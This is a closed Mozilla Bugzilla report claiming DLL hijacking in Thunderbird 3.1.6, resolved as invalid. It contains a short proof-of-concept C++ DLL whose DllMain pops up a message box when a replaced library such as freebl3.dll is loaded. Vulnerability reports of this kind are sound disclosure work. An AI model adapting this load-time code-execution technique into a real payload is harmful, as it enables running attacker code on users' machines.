Closed Bug 609223 Opened 14 years ago Closed 14 years ago

DLL hijacking is possible in Thunderbird 3.1.6

Categories

(Thunderbird :: Security, defect)

Product:
Thunderbird
Component:
Security
Platform:
x86
Windows XP
Type:
defect
Priority:
Not set
Severity:
critical

Tracking

(Not tracked)

Status:
RESOLVED INVALID

People

(Reporter: again.liu, Unassigned)

Details

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12 Build Identifier: 3.1.6 freebl3.dll, nssckbi.dll, nssdbm3.dll and softokn3.dll in Mozilla Thunderbird 3.1.6 is prone to DLL hijacking attack. Reproducible: Always Steps to Reproduce: Compile the following code, change the name of the DLL, then replace it with the original one. VC++ 2010, Released, Multi-threaded(/MT) ========================================================================= #include<Windows.h> void init() { MessageBoxA(NULL, "owned by moigai", "YOOOOOO!!", MB_OK); } BOOL APIENTRY DllMain(HANDLE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) { switch(ul_reason_for_call) { case DLL_PROCESS_ATTACH: init(); break; case DLL_THREAD_ATTACH: case DLL_THREAD_DETACH: case DLL_PROCESS_DETACH: break; } return TRUE; } ========================================================================= Actual Results: the message box coded will pop up
Same treatment as bug 609208
Status: UNCONFIRMED → RESOLVED
Closed: 14 years ago
Resolution: --- → INVALID
You need to log in before you can comment on or make changes to this bug.